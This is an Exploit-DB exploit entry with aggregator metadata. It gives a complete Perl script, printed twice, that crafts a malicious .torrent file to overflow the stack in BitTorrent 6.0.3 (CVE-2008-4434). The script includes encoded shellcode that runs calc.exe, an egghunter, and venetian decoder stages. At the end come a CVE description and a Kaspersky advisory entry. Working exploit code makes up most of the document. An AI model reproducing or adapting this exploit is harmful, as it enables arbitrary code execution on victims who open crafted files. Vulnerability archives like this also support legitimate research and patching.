ID EDB-ID:6787 Type exploitdb Reporter Guido Landi Modified 2008-10-19T00:00:00
Description
BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit. CVE-2008-4434. Local exploit for windows platform
#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by k`sOSe && oVeret
use warnings;
use strict;
# If you change this(avoid \x80->\x9f unless you really know what you are doing) you must also change the length value of the decoder
my $shellcode =
# windows/exec CMD="C:\WINDOWS\system32\calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" .
"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" .
"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" .
"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" .
"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" .
"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" .
"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" .
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" .
"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" .
"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" .
"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" .
"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" .
"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" .
"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" .
"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" .
"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" .
"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" .
"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" .
"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" .
"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" .
"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" .
"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" .
"\x41";
$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version )
my $ret = "\x3f\x41"; # -> unicode friendly pop,pop,ret
# unicode friendly get_EIP (needed by the venetian decoder)
sub get_eip
{
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#6A 00 PUSH 0
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
#57 PUSH EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#54 PUSH ESP
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5A POP EDX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#43 INC EBX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
"\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . "\x42\x58\x41";
}
sub egghunter
{
#6A01 PUSH 1
#5E POP ESI
#4E DEC ESI (=0)
#6A72 PUSH 72 <- starts from 0x00720000
#56 PUSH ESI
#4C DEC ESP
#4C DEC ESP
#5E POP ESI
#5E POP ESI <- ESI == 0x00720000
#BA21202120 /MOV EDX,20212021 <- egg
#46 |INC ESI
#3B16 |CMP EDX,DWORD PTR DS:[ESI]
#75FB \JNZ SHORT egghunter
"\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB";
}
# this will decode the unicode expanded shellcode pushing it to the stack and the execute it
sub decoder
{
#46 INC ESI
#6A01 PUSH 1
#6801010155 PUSH 0x55010101
#4C DEC ESP
#5B POP EBX
#5B POP EBX
#AD /LODS DWORD PTR DS:[ESI]
#50 |PUSH EAX
#44 |INC ESP
#44 |INC ESP
#44 |INC ESP
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4B |DEC EBX
#83FB01 |CMP EBX,1
#75EF \JNE SHORT decoder
#54 PUSH ESP
#59 POP ECX
#4C DEC ESP -> realign
#51 PUSH ECX
#C3 RET
"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3";
}
# venetian deccoder + venetian encoded egghunter and decoder
sub venetian_decoder
{
"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40".
"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6".
"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71".
"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71".
"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71".
"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01".
"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40".
"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40".
"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6".
"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71".
"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71".
"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71".
"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B".
"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51";
}
my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder();
open(HANDLE, "> torrent.torrent") || die "Error!\n\n";
print HANDLE "d8:announce17:http://qwerty.qwe7:comment" .
length($shellcode) .":" .
$shellcode .
"10:created by" .
length($stack_buffer) . ":" .
$stack_buffer .
"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".
"\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a";
close (HANDLE);
# milw0rm.com [2008-10-19]
{"bulletinFamily": "exploit", "id": "EDB-ID:6787", "cvelist": ["CVE-2008-4434"], "modified": "2008-10-19T00:00:00", "lastseen": "2016-02-01T00:39:29", "edition": 1, "sourceData": "#!/usr/bin/perl\n# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit\n# 09/21/2008 by k`sOSe && oVeret\n\nuse warnings;\nuse strict;\n\n# If you change this(avoid \\x80->\\x9f unless you really know what you are doing) you must also change the length value of the decoder\nmy $shellcode = \n# windows/exec CMD=\"C:\\WINDOWS\\system32\\calc.exe\" \n#[*] x86/alpha_mixed succeeded, final size 337 \n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" .\n\"\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\" .\n\"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\" .\n\"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x51\" .\n\"\\x54\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\\x4c\\x4c\" .\n\"\\x4b\\x43\\x4c\\x45\\x55\\x44\\x38\\x43\\x31\\x4a\\x4f\\x4c\\x4b\\x50\" .\n\"\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a\\x4b\\x51\" .\n\"\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\\x51\\x49\" .\n\"\\x50\\x4a\\x39\\x4e\\x4c\\x4b\\x34\\x49\\x50\\x42\\x54\\x43\\x37\\x49\" .\n\"\\x51\\x48\\x4a\\x44\\x4d\\x45\\x51\\x48\\x42\\x4a\\x4b\\x4c\\x34\\x47\" .\n\"\\x4b\\x50\\x54\\x47\\x54\\x43\\x34\\x43\\x45\\x4d\\x35\\x4c\\x4b\\x51\" .\n\"\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44\\x4c\\x50\" .\n\"\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b\\x45\" .\n\"\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44\\x45\" .\n\"\\x54\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x45\\x30\\x46\\x36\\x45\" .\n\"\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c\\x4c\" .\n\"\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x45\\x58\\x4d\" .\n\"\\x59\\x4b\\x48\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x45\\x38\\x4a\" .\n\"\\x50\\x4c\\x4a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4c\\x58\\x4b\\x4e\\x4c\" .\n\"\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4a\\x47\\x50\\x43\\x46\\x5a\\x51\" .\n\"\\x4c\\x46\\x37\\x50\\x49\\x50\\x4e\\x51\\x54\\x50\\x4f\\x50\\x57\\x50\" .\n\"\\x53\\x51\\x4c\\x42\\x53\\x43\\x49\\x44\\x33\\x44\\x34\\x45\\x35\\x42\" .\n\"\\x4d\\x50\\x33\\x46\\x52\\x51\\x4c\\x42\\x43\\x43\\x51\\x42\\x4c\\x45\" .\n\"\\x33\\x46\\x4e\\x43\\x55\\x42\\x58\\x42\\x45\\x43\\x30\\x44\\x4a\\x41\" .\n\"\\x41\";\n\n$shellcode .= \"\\x87\\x87\"; # -> \\x21\\x20\\x21\\x20 -> EGG ( for english windows version )\n\nmy $ret\t= \"\\x3f\\x41\"; # -> unicode friendly pop,pop,ret\n\n# unicode friendly get_EIP (needed by the venetian decoder)\nsub get_eip\n{\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5F POP EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5F POP EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#6A 00 PUSH 0\n\t#58 POP EAX\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#57 PUSH EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#54 PUSH ESP\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5A POP EDX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#43 INC EBX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#58 POP EAX\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t\"\\x5f\\x41\\x5f\\x41\\x6a\\x58\\x41\\x57\\x41\\x54\\x41\\x5a\" . \"\\x42\\x40\" x 12 . \"\\x42\\x43\" . \"\\x42\\x58\\x41\";\n}\n\n\nsub egghunter\n{\n\t#6A01\t\tPUSH 1\n\t#5E\t\tPOP ESI\n\t#4E\t\tDEC ESI (=0)\n\t#6A72\t\tPUSH 72\t\t\t\t<- starts from 0x00720000\n\t#56\t\tPUSH ESI\n\t#4C\t\tDEC ESP\n\t#4C\t\tDEC ESP\n\t#5E\t\tPOP ESI\n\t#5E\t\tPOP ESI\t\t\t\t<- ESI == 0x00720000\n\t#BA21202120\t/MOV EDX,20212021\t\t<- egg\n\t#46\t\t|INC ESI\n\t#3B16\t\t|CMP EDX,DWORD PTR DS:[ESI]\n\t#75FB\t\t\\JNZ SHORT egghunter\n\t\"\\x6A\\x01\\x5E\\x4E\\x6A\\x72\\x56\\x4C\\x4C\\x5E\\x5E\\xBA\\x21\\x20\\x21\\x20\\x46\\x3B\\x16\\x75\\xFB\";\n}\n\n# this will decode the unicode expanded shellcode pushing it to the stack and the execute it\nsub decoder\n{\n\t#46\t\tINC ESI\n\t#6A01\t\tPUSH 1\n\t#6801010155\tPUSH 0x55010101\n\t#4C\t\tDEC ESP\n\t#5B\t\tPOP EBX\n\t#5B\t\tPOP EBX\n\t#AD\t\t/LODS DWORD PTR DS:[ESI]\n\t#50\t\t|PUSH EAX\n\t#44\t\t|INC ESP\n\t#44\t\t|INC ESP\n\t#44\t\t|INC ESP\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4B\t\t|DEC EBX\n\t#83FB01\t\t|CMP EBX,1\n\t#75EF\t\t\\JNE SHORT decoder\n\t#54\t\tPUSH ESP\n\t#59\t\tPOP ECX\n\t#4C\t\tDEC ESP\t\t-> realign\n\t#51\t\tPUSH ECX\n\t#C3\t\tRET\n\"\\x46\\x6A\\x01\\x68\\x01\\x01\\x01\\x55\\x4C\\x5B\\x5B\\xAD\\x50\\x44\\x44\\x44\\x4E\\x4E\\x4E\\x4E\\x4E\\x4E\\x4B\\x83\\xFB\\x01\\x75\\xEF\\x54\\x59\\x4c\\x51\\xc3\";\n}\n\n# venetian deccoder + venetian encoded egghunter and decoder\nsub venetian_decoder\n{\n\"\\x05\\x03\\x01\\x71\\x2D\\x01\\x01\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\".\n\"\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x72\\x71\\x40\\x71\\x40\\x71\\xC6\".\n\"\\x4C\\x71\\x40\\x71\\x40\\x71\\xC6\\x5E\\x71\\x40\\x71\\x40\\x71\\xC6\\xBA\\x71\".\n\"\\x40\\x71\\x40\\x71\\xC6\\x20\\x71\\x40\\x71\\x40\\x71\\xC6\\x20\\x71\\x40\\x71\".\n\"\\x40\\x71\\xC6\\x3B\\x71\\x40\\x71\\x40\\x71\\xC6\\x75\\x71\\x40\\x71\\x40\\x71\".\n\"\\xC6\\x46\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\".\n\"\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\\x71\\xC6\\x4C\\x71\\x40\".\n\"\\x71\\x40\\x71\\xC6\\x5B\\x71\\x40\\x71\\x40\\x71\\xC6\\x50\\x71\\x40\\x71\\x40\".\n\"\\x71\\xC6\\x44\\x71\\x40\\x71\\x40\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\".\n\"\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x4B\\x71\".\n\"\\x40\\x71\\xFE\\xFE\\x40\\x71\\xC6\\xFB\\x71\\x40\\x71\\x40\\x71\\xC6\\x75\\x71\".\n\"\\x40\\x71\\x40\\x71\\xC6\\x54\\x71\\x40\\x71\\x40\\x71\\xC6\\x4C\\x71\\x40\\x71\".\n\"\\x40\\x71\\xC6\\xC3\\x71\\x40\\x71\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x6A\\x5E\\x6A\\x56\\x4C\\x5E\\x21\\x21\\x46\\x16\\xFB\\x6A\\x68\\x01\\x55\\x5B\".\n\"\\xAD\\x44\\x44\\x4E\\x4E\\x4E\\x81\\x01\\xEF\\x59\\x51\";\n}\n\nmy $stack_buffer\t= $ret x 192 . get_eip() . venetian_decoder();\n\nopen(HANDLE, \"> torrent.torrent\") || die \"Error!\\n\\n\";\nprint HANDLE\t\"d8:announce17:http://qwerty.qwe7:comment\" \t. \n\t\tlength($shellcode) .\":\" \t\t\t. \n\t\t$shellcode .\n\t\t\"10:created by\" \t\t\t\t.\n\t\tlength($stack_buffer) . \":\"\t\t\t.\n\t\t$stack_buffer\t\t\t\t\t.\n\t\t\"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:\".\t\n\t\t\"\\x86\\xf7\\xe4\\x37\\xfa\\xa5\\xa7\\xfc\\xe1\\x5d\\x1d\\xdc\\xb9\\xea\\xea\\xea\\x37\\x76\\x67\\xb8\\x65\\x65\\x0a\";\nclose (HANDLE);\n\n# milw0rm.com [2008-10-19]\n", "published": "2008-10-19T00:00:00", "href": "https://www.exploit-db.com/exploits/6787/", "osvdbidlist": ["47585"], "reporter": "Guido Landi", "hash": "39a185444e8c2313e3cdd197d5b9e73f55fec08bd153df5e10c3fb7fc0b6bfce", "title": "BitTorrent 6.0.3 - .torrent Stack Buffer Overflow Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit. CVE-2008-4434. Local exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6787/", "viewCount": 2, "enchantments": {"vulnersScore": 4.9}}
{"result": {"cve": [{"id": "CVE-2008-4434", "type": "cve", "title": "CVE-2008-4434", "description": "Stack-based buffer overflow in (1) uTorrent 1.7.7 build 8179 and earlier and (2) BitTorrent 6.0.3 build 8642 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long Created By field in a .torrent file.", "published": "2008-10-03T18:22:45", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4434", "cvelist": ["CVE-2008-4434"], "lastseen": "2017-08-08T11:24:56"}], "kaspersky": [{"id": "KLA10089", "type": "kaspersky", "title": "\r KLA10089DoS vulnerability in Torrent\t\t\t ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n10/03/2008\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in the BitTorrent & UTorrent. By exploiting this vulnerability malicious users can cause denial of service and possibly execute arbitrary code. This vulnerability can be exploited remotely via a specially designed .torrent file.\n\n### *Affected products*:\nBitTorrent versions 6.0.3 build 8642 and earlier \nUTorrent versions 1.7.7 build 8179 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[uTorrent](<https://threats.kaspersky.com/en/product/uTorrent/>)\n\n### *CVE-IDS*:\n[CVE-2008-4434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4434>)", "published": "2008-10-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10089", "cvelist": ["CVE-2008-4434"], "lastseen": "2018-03-30T14:11:14"}]}}